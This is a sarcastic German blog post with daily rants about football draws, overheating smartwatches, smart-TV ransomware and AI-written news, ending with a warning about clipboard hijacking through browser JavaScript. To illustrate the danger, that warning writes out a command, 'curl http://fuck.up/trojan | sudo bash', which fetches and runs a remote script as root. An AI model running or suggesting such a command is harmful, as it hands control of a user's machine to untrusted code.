Brüllball des tages

Ihr habt doch nicht wirklich geglaubt, dass die auslosungen für große brüllball-wettbewerbe irgendetwas mit zufall zu tun gehabt haben. Das wäre scheiße fürs geschäft, wenn da mal zufällig schnell ein paar richtig große geldbringerverbände ausscheiden müssten.

Und, gefällt es euch, die ganze korrupzjon und den ganzen beschiss des scheißbrüllballgeschäftes mit euren „rundfunkgebühren“ mitfinanzieren zu müssen? Tja, ist schon doof, wenn man so doof ist, dass es einem sogar noch gefällt, betrogen zu werden.

Armbanduhr des tages

Na, „smartwatch“?

Verbrannte Handgelenke und geschmolzene Ladeschalen veranlassen Basis zu einem Vertriebsstopp und einer Gebrauchswarnung für die Smartwatch Basis Peak. Wer sie hat, soll sie vorerst bitte nicht tragen

Eine geringe Anzahl von Leuten hat berichtet, dass ihre Basis Peak Uhren überhitzen und […] Verbrennungen am Handgelenk unter der Uhr verursachen

Bwahahahaha!

Ach ja, ich wünsche euch auch weiterhin viel spaß mit eurem teuren, nutzlosen und entrechtenden techniktinnef, ihr versuchskaninchen der smartdinger-industrie! Immer kaufen, ist neu, „smart“, einfach und wischgeste, also kaufen, weil muss man haben! 😀

Smartding des tages

Ist doch toll, dass ihr jetzt alle so „smarte“ glotzen habt, wenn auch das programm nicht so „smart“ ist. Scheiße nur, wenn ihr so ein brüllball-endspiel glotzen wollt und statt des grünen rasens für die blutrote grätsche eine hässliche aufforderung seht, doch mal ein paar bitcoin rüberwaxen zu lassen, um weiterglotzen zu können. Endlich erpressungstrojaner für glotzen!

Ich wünsche auch weiterhin viel spaß mit den ganzen „smarten“ dingern, die ihr euch ins leben stellt! Freut ihre euch eigentlich auch schon auf die „smarten“ autos? Hach, wenn euch doch nur vorher jemand gewarnt hätte… :mrgreen:

Jornalismus des tages

Tatsächlich kann intelligente Software, die mit den richtigen Daten gefüttert wird, inzwischen ganz ordentliche Artikel schreiben. Die meisten Leser erkennen den Unterschied auf Anhieb nicht mehr

Freust du dich schon auf dein von dir selbst aktiv mit herbeigeschriebenes und herbeipropagandiertes hartz-IV, du scheißjornalist?! Wenn man so hirnlos ist wie du, dann ist man halt recht leicht durch softwäjhr zu ersetzen… :mrgreen:

Javascript des tages

Na, linuxer! Schon einmal kohd für die kommandozeile aus dem brauser ins terminal kopiert? Praktische schnippsel gibts ja in jedem forum. Ist aber keine gute idee, wenn man dabei javascript im brauser gestattet, denn javascript kann den inhalt der zwischenablage verändern. Ist schon kacke, wenn man sudo apt-get install blah ins terminalfenster kopiert hat und schließlich curl http://fuck.up/trojan | sudo bash ausführt und hinterher einen rechner anderer leute auf dem schreibtisch stehen hat. 😀

Und nein, das ist keine teoretische gefahr. Selbst auf einer vertrauenswürdigen webseit könnte ein entsprechender kohd über ein werbebanner oder eine XSS-lücke im forensystem oder CMS untergejubelt werden.

Denn was in der Zwischenablage landet, lässt sich nicht ohne Weiteres kontrollieren. So wäre es durchaus denkbar, dass der Nutzer mit einer interessanten Funktion für die Kommandozeile mögliche Opfer anlockt und ihnen hier etwa Code unterschiebt, der die Sicherheit des Systems beeinträchtigt oder Schäden hervorruft. Daher sollte man Inhalte, die aus einer Webseite kopiert wurden, nicht direkt in die Eingabeaufforderung einfügen – sondern zur Sicherheit besser erst einmal in einen Texteditor, wo sich ohne Risiko überprüfen lässt, was in der Zwischenablage landete

Ich muss widersprechen! Darum sollte man immer, immer, immer javascript abschalten, wenn es nicht unbedingt technisch erforderlich ist. Javascript ist die mutter aller modernen sicherheitsprobleme im webbrauser (und außerdem der inbegriff aller dinge, die im gegenwärtigen web völlig falsch laufen und gestoppt werden müssen). Die verwendung von noscript ist ein absolutes muss, wichtiger und wirksamer als jedes antivirus-schlangenöl; und das privileg der javascript-ausführung sollte so restriktiv vergeben werden, wie es gerade noch möglich ist. Dass man die webbildzeitung so nicht mehr lesen kann, wird kein fühlendes wesen als einschränkung empfinden…